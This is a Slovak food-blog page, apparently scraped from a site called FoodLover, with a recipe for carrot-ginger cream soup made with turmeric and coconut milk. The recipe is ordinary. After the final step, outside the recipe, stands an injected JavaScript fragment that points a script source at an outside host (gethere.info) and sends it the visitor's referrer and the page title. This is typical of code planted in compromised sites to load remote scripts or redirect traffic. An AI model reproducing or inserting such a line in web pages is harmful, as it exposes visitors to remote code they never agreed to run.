FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Polievky / Mrkvovo-zázvorový krém

Mrkvovo-zázvorový krém

25/01/2015 by Martina 1 Comment

Kombinácia zázvoru a mrkvy mi vždy pripadala netradičná a zvláštna. Veď predsa zázvor je silne aromatický, priam až štipľavý a mrkva sladká a voňavá.

Viackrát som túto polievku videla v reštaurácii na menu, priatelia mi o nej povedali, ale vždy som si predstavila polievku, ktorá bude kyslá, štipľavá a budú v nej plávať kúsky mrkvy.

Až teraz, keď som tento recept vyskúšala, sa ukázalo, že táto kombinácia je neprekonateľná. Vznikol tak hybrid medzi thajským kari a domácou sviečkovou :).

Už pri prvom súste ucítite chuť orientu – korenistosť zázvoru, sladkosť mrkvy a jemnosť kokosového mlieka. Neopakovateľná vôňa a krémovosť robia z tejto polievky pokrm, ktorý si vychutnáte naozaj všetkými zmyslami.

mrkvovo-zazvorova polievka

Ingrediencie:

  • 2 veľké cibule
  • 3 strúčiky cesnaku
  • 1kg mrkvy
  • kúsok očisteného zázvoru – veľkosti palca
  • 1l domáceho vývaru / vody
  • 1dcl kokosového mlieka
  • 2 lyžičky kurkumy
  • 1/2 lyžičky soli a štipka korenia
  • 1 lyžica olivového/kokosového oleja

Postup:

  1. Cibuľu a cesnak nakrájame a dusíme na oleji 5 minút.
  2. Medzitým si nakrájame mrkvu na kocky a pridáme ju k cibuľke a cesnaku. Zázvor nastrúhame a taktiež pridáme do hrnca.
  3. Premiešame, posolíme a okoreníme. Podlejeme vývarom alebo vodou a varíme 15-20 minút.
  4. Polievku odstavíme a vymixujeme tyčovým mixérom alebo v blenderi.
  5. Krémovú zmes vrátime do hrnca, pridáme kurkumu a kokosové mlieko. Za stáleho miešania necháme prevrieť a odstavíme.
  6. Podľa chuti pridáme ešte soľ a korenie.
  7. Podávame čistú, prípadne s mäskom.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;